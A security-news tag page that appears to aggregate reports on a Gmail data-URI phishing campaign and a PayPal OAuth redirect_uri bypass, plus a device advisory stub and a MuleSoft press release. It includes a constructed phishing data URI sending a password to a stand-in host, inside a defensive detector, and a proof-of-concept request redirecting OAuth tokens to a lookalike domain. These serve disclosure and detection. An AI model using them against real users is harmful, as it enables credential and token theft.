
Tag: Uniform Resource Identifier (URI)

Brilliant phishing attack probes sent mail, sends fake attachments

Strategy_Doc.PDF from the next cubicle is actually a portal to p0wnage

A newly-detected Gmail phishing attack sees criminals hack and then rifle through inboxes to target account owners' contacts with thoroughly convincing fake emails. The attack reuses the file names of previously sent attachments for new attachments that appear to be PDFs but are actually images; when clicked, they send victims to phishing pages. Suitable subject lines stolen from sent emails are applied to the new phishing emails, making the mischievous messages look more legitimate. Even the URL to which the attachments point is crafted to appear legitimate, bearing the google.com domain, says WordFence chief executive officer Mark Maunder, who reported the attacks.

"You are probably thinking you're too smart to fall for this: It turns out that this attack has caught, or almost caught several technical users who have either tweeted, blogged or commented about it," Maunder says. "It is being used right now with a high success rate … this technique can be used to steal credentials from many other platforms with many variations in the basic technique."

[Image: The phishing landing page. Image: WordFence.]

Users who fall for the attacks can be saved by two-factor authentication. One user claiming to be a system administrator at a school says the attacks compromised students and three staff within two hours, using an athletic schedule paired with a matching subject line to pull off the attacks.

This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh — Tom Scott (@tomscott) December 23, 2016

Attackers use the data URI scheme to embed a file in the browser location bar; it executes once the malicious attachment is clicked, displaying the fake Google login page and a google.com address. Keen-eyed users may spot the URL prefix data:text/html or the lower-resolution Google image in the phishing page. White space separates and hides the file text, which invokes the phishing page in a new browser tab, from the visible URL. Maunder says the phishing attacks do not trigger Google's green or red secure and insecure HTTPS security indicators, giving them an appearance of uniformity that makes the attacks highly effective. "In user interface design and in human perception, elements that are connected by uniform visual properties are perceived as being more related than elements that are not connected," he says. He recommends Google change the colour of the data:text/html prefix to amber, which would grab users' attention.
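The location-bar check the article implies, as an added example that is not part of the original article or of WordFence's code: it flags a `data:` URI whose media type is `text/html`, whose payload is padded with long runs of whitespace, or whose payload carries a protected brand hostname (google.com is the case the article describes; the `PROTECTED_HOSTS` list and every sample string are constructed for this example). For ordinary `http(s)` URLs it also flags a brand name that appears in the string but not in the actual hostname.

```python
import re
from urllib.parse import urlparse

# Brand hostnames whose login pages the check protects (constructed list;
# google.com is the one named in the article).
PROTECTED_HOSTS = ("google.com",)

# Constructed sample location-bar strings, not captured from the real campaign.
SAMPLES = {
    "real_login": "https://accounts.google.com/ServiceLogin?service=mail",
    "data_uri_lookalike": (
        "data:text/html,https://accounts.google.com/ServiceLogin"
        + " " * 300  # whitespace pushes the real content out of view
        + "<html><body><form action='https://example.invalid/collect'>"
          "<input name='password'></form></body></html>"
    ),
    "plain_data_image": "data:image/png;base64,iVBORw0KGgo=",
}


def _host_matches(host, brand):
    """True when host is the brand domain or one of its subdomains."""
    return host == brand or host.endswith("." + brand)


def classify_location(url):
    """Classify a location-bar string as the user would see it.

    Returns {"scheme": ..., "flags": [...], "verdict": "ok" | "suspicious"}.
    """
    s = url.strip()
    scheme = s.split(":", 1)[0].lower() if ":" in s else ""
    flags = []

    if scheme == "data":
        flags.append("data-uri")
        # data:[<mediatype>][;base64],<payload>
        header, _, payload = s[len("data:"):].partition(",")
        mediatype = header.split(";")[0].strip().lower() or "text/plain"
        if mediatype == "text/html":
            flags.append("html-payload")
        # Long whitespace runs hide the payload behind the visible "URL".
        if re.search(r"[ \t]{20,}", payload):
            flags.append("whitespace-padding")
        # A brand hostname typed into the payload is what the victim reads.
        for brand in PROTECTED_HOSTS:
            if brand in payload.lower():
                flags.append("brand-in-data-uri")
                break
    elif scheme in ("http", "https"):
        host = (urlparse(s).hostname or "").lower()
        for brand in PROTECTED_HOSTS:
            if brand in s.lower() and not _host_matches(host, brand):
                flags.append("brand-outside-host")
                break

    suspicious = (
        "data-uri" in flags
        and ("html-payload" in flags or "brand-in-data-uri" in flags)
    ) or "brand-outside-host" in flags
    return {
        "scheme": scheme,
        "flags": flags,
        "verdict": "suspicious" if suspicious else "ok",
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, classify_location(sample))
```

A plain `data:image/...` URI is left alone so that inline images, which many legitimate pages use, do not trip the check; only an HTML payload or a brand string inside a `data:` URI is treated as a lookalike login page.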

PayPal proffers patch for OAuth app hack hole

Payment giant takes second look at bad bugs.

PayPal has patched a phishing vulnerability that could allow attackers to steal any OAuth token for its payment apps and gain access to accounts. Adobe software engineer and OAuth wonk Antonio Sanso discovered the token request flaw after messing with redirect URLs. He found PayPal's authorisation server, set up to handle OAuth token requests via the developer Dashboard, could be manipulated to accept localhost as a redirect_uri, the address to which tokens are shipped.

Sanso showcased the redirect_uri flaw by altering requests made by the PayPal OAuth demonstration app, whose registered redirect_uri is https://demo.paypal.com/loginsuccessful:

https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid%20profile%20email%20address%20phone%20https://uri.paypal.com/services/paypalattributes%20https://uri.paypal.com/services/paypalattributes/business%20https://uri.paypal.com/services/expresscheckout&redirect_uri=https://demo.paypal.com/loginsuccessful&nonce=&newUI=Y

He then inked a DNS entry for http://localhost.intothesymmetry.com to capture requests:

https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid%20profile%20email%20address%20phone%20https://uri.paypal.com/services/paypalattributes%20https://uri.paypal.com/services/paypalattributes/business%20https://uri.paypal.com/services/expresscheckout&redirect_uri=http://localhost.intothesymmetry.com/&nonce=&newUI=Y

"So it really looks like that even if Paypal did actually perform exact matching validation, localhost was a magic word and it overrode the validation completely," Sanso says.

PayPal squashed the bug earlier this month after initially deciding it was not a vulnerability in September. Sanso reported similar redirect_uri bugs to Facebook in 2014 that could be used to steal OAuth access tokens.

He says developers using OAuth must register full, exact redirect_uri addresses with no second-stage redirects to protect their apps.

PayPal Fixes OAuth Token Leaking Vulnerability

PayPal fixed an issue that could have allowed an attacker to hijack OAuth tokens associated with any PayPal OAuth application. The vulnerability was publicly disclosed on Monday by Antonio Sanso, a senior software engineer at Adobe, after he came across the issue while testing his own OAuth client. For its part, PayPal remedied the vulnerability about three weeks ago.

The OAuth flaw, according to Sanso, stemmed from the token request and acquisition process. For starters, PayPal allows developers to create and edit their own apps through its developer application dashboard. After creating them, developers can register those apps and obtain an access token for them by sending a request to the company, which acts as an authorization server. That PayPal server could be overridden, however, Sanso found.

According to Sanso, the vulnerability stems from an error PayPal made when it implemented OAuth. Developers with the company had set it up to accept localhost, the standard hostname for the local computer a program is running on, as the redirect_uri, the address to which OAuth providers deliver access tokens via browser redirect. After creating a DNS entry on his own site that mimicked localhost – http://localhost[.]intothesymmetry[.]com – Sanso found he could send a request to PayPal using that URL as the redirect_uri. It ultimately overrode the validation stipulated by PayPal and returned a PayPal OAuth client token.

Sanso stressed to Threatpost that since it was universal, the trick could have worked for any PayPal OAuth client. Before the issue was fixed, he claims, he could've made an OAuth request using his redirect_uri and the client_id of any application to get an app's authorization token sent to his server. PayPal began employing stricter checks on the redirect_uri parameter in 2015 and uses exact matching to validate requests, but Sanso was still able to trick it with his own localhost subdomain.

In this case 'localhost' was almost like a "magic word," Sanso said. He told Threatpost that what an attacker would be able to do with the access tokens would depend largely on the scope of the access token and the OAuth flow. Sanso, who lives in Switzerland and co-authored a book on OAuth 2.0 last year, discovered the issue back in September, but it took some prodding to get the issue resolved. Following a back and forth with the company – and radio silence for the month of October – PayPal informed Sanso on November 7 that it had fixed the issue.

All your Paypal #OAuth tokens belong to me – localhost for the win – https://t.co/IW1Pg1KV2M pic.twitter.com/w05Ca2SRGN — Antonio Sanso (@asanso) November 28, 2016

The company did not immediately return a request for comment on Monday, but according to Sanso developers there fixed the issue by making it so the "PayPal Authorization Server no longer overrides the correct validation they had in place."

The way Sanso bypassed PayPal's redirect_uri validation is similar to how Egor Homakov, a Russian researcher who went on to found the pen testing firm Sakurity, hacked GitHub in 2014. Through a series of OAuth bugs, Homakov found he could bypass validations in GitHub with a path traversal attack. Homakov found that every time he requested an authorization token, the provider responded with a valid access_token. Another bug he found could allow an attacker to hijack the authorization code used for the redirect_uri. GitHub's bug bounty program was in its infancy at the time, but it fixed those bugs and awarded Homakov $4,000 for uncovering the vulnerabilities.

Facebook has patched issues that hinged on how the site used OAuth over the years as well. In 2014 it fixed an issue, also discovered by Sanso, that allowed a bypass stemming from improper validation of the redirect_uri. Facebook patched a similar bug in 2013, dug up by Nir Goldshlager, that relied on tricking victims into following a link. Goldshlager modified the URL string Facebook used for OAuth to get users to navigate to his own site and capture their access token there.

Researchers with the University of Hong Kong highlighted a nasty flaw in OAuth 2.0 earlier this month at Black Hat Europe. A trio of academics said at the conference that poor OAuth implementations that allow for Facebook and Google single sign-on functionality can lead to account hijacking in one billion mobile apps.
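The redirect_uri validation both articles above turn on, as an added example that is not PayPal's code or Sanso's: a registry of exact redirect URIs per client, a `flawed_validate` that models the described behaviour as an assumed special case (any hostname beginning with "localhost" is waved through before the exact-match check; the real server-side logic is not on the page, so this is a hypothesis used only to show the contrast), and a `strict_validate` that does nothing but an exact string comparison. `is_registrable` encodes the advice to register full, exact addresses: absolute HTTPS URIs with no fragment and no wildcard. The registry contents and the hostnames are constructed for this example, with the demo redirect_uri and the localhost subdomain taken from the articles.

```python
from urllib.parse import urlsplit

# Constructed registry (not PayPal's): client_id -> registered redirect URIs.
REGISTERED = {
    "demo-client": ("https://demo.paypal.com/loginsuccessful",),
}


def flawed_validate(client_id, redirect_uri):
    """Model of the bug described in the articles (assumed shape).

    Exact matching is in place, but a hostname starting with "localhost"
    bypasses it entirely, so localhost.<attacker-domain> passes.
    """
    host = (urlsplit(redirect_uri).hostname or "").lower()
    if host.startswith("localhost"):  # the "magic word"
        return True
    return redirect_uri in REGISTERED.get(client_id, ())


def strict_validate(client_id, redirect_uri):
    """Exact string comparison against the registered list, nothing else.

    No normalisation, no prefix matching, no hostname special cases.
    """
    return redirect_uri in REGISTERED.get(client_id, ())


def is_registrable(redirect_uri):
    """Accept only full, exact redirect URIs at registration time."""
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https":
        return False  # tokens must not travel over plain HTTP
    if not parts.hostname:
        return False  # relative URIs cannot be matched exactly
    if parts.fragment:
        return False  # fragments are never sent to the server
    if "*" in redirect_uri:
        return False  # wildcards defeat exact matching
    return True


def authorize(client_id, redirect_uri, validator=strict_validate):
    """Return the outcome of the authorization request's redirect check."""
    if validator(client_id, redirect_uri):
        return "redirect-allowed"
    return "error: invalid redirect_uri"


if __name__ == "__main__":
    probe = "http://localhost.intothesymmetry.com/"
    print("flawed:", authorize("demo-client", probe, flawed_validate))
    print("strict:", authorize("demo-client", probe, strict_validate))
    print("registrable:", is_registrable("https://demo.paypal.com/loginsuccessful"))
```

With strict validation the registered URI and the request parameter must be byte-for-byte equal; a lookalike subdomain, a trailing path segment, or a scheme downgrade all fail closed, which is the property PayPal's fix restored according to Sanso.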

VU#974424: Crestron Electronics DM-TXRX-100-STR web interface contains multiple vulnerabilities

Crestron Electronics DM-TXRX-100-STR web interface contains multiple vulnerabilities

Original Release date: 01 Aug 2016 | Last revised: 01 Aug 2016

Overview: Crestron Electronics DM-TXRX-100-STR, version 1.2866.00026 and earlier, has a web management ...

Barclays Launches Digital Banking Hackathon with MuleSoft

Barclays and MuleSoft Join Forces to Drive Innovation in Financial Services with APIs

LONDON – July 20, 2016 – MuleSoft, provider of the leading platform for building application networks, today announced that it has partnered with Barclays to host a digital banking hackathon.

The hackathon will take place at Barclays Technology Centre Radbroke in Cheshire on July 20 and 21.

The event aims to foster innovation and harness technology to build a range of new financial services solutions. Peter Josse, UK chief information officer, Barclays, said, “We are thrilled to be joined by a number of our partners, including MuleSoft, to host our digital banking hackathon.

The ability to partner with other organisations to explore new and emerging digital banking technologies and APIs is critical in understanding how we can evolve new products and services for our customers and clients.”

Unlocking the Potential of APIs in Financial Services

APIs are the building blocks used to define how data is accessed, exposed and shared across an application network. Hackathon participants will leverage Anypoint Platform™ and RAML (RESTful API Modeling Language) to develop digital-only banks, personalized products and services, and new banking experiences across mobile, tablet and television. Prior to the event, developers can take advantage of MuleSoft Champions Program’s unique online onboarding and learning environment to familiarize themselves with Anypoint Platform and RAML, review tutorials and gain access to various developer resources. With Anypoint Platform, organizations can build a seamless application network of applications, data and devices through API-led connectivity, whether in the cloud or on-premises.

By making any application, data or device pluggable and reusable, an application network enables financial services organizations to leverage existing and new technologies to drive innovation and agility at scale, launch new products and revenue opportunities, and improve customer experience. “Financial services organizations are in the midst of tremendous change, driven by regulatory and compliance pressures, increasing customer demands and the threat posed by new entrants.

This is driving organizations to re-evaluate what products and services they deliver and through which channels,” said Uri Sarid, CTO, MuleSoft. “We’re excited to work with Barclays to encourage new ways of thinking in banking by applying an API-led approach to connecting data, applications and devices in an application network, as well as leveraging RAML.

By harnessing the power of Anypoint Platform to build application networks and the simplicity of RAML to design good APIs, developers have the opportunity to explore and create in an ecosystem primed for innovation and experimentation – and that ecosystem will persist and grow long after the hackathon.”

Strong Customer Momentum in the Financial Services Industry

MuleSoft continues to see growing market demand from the financial services industry, as organizations in the space are recognizing that connectivity is critical to achieving their strategic initiatives, such as enriching consumer experiences, increasing operational efficiencies and delivering capabilities through digital channels.

Financial services customers include BBVA Banco Frances, Equity Insurance Group, Mastercard and Sagicor Life Insurance Company, as well as four of the top nine global banks and one of the top three global insurance companies. For more information about MuleSoft’s financial services solutions, visit: https://www.mulesoft.com/integration-solutions/soa/financial-services

About Anypoint Platform

MuleSoft’s Anypoint Platform™ is a complete solution for API-led connectivity that creates a seamless application network of apps, data, and devices, both on-premises and in the cloud.

This hybrid integration platform includes iPaaS, ESB, and a unified solution for API management, design and publishing.

About MuleSoft

MuleSoft makes it easy to connect the world's applications, data and devices. With our market-leading Anypoint Platform™, companies are building application networks to fundamentally change the pace of innovation. MuleSoft’s API-led approach to connectivity gives companies new ways to reach their customers, employees and partners. Organizations in more than 60 countries, from emerging companies to Global 500 corporations, use MuleSoft to transform their businesses.

To find out how, visit http://mulesoft.com. MuleSoft is a registered trademark of MuleSoft, Inc.

All other marks are those of respective owners.
### Media Contacts

Vera Wang, MuleSoft, press@mulesoft.com, 415-920-3162

Jillian Alexander, Speakeasy Strategies (PR for MuleSoft), jillian@speakeasystrategies.com, +44 79 49 602 484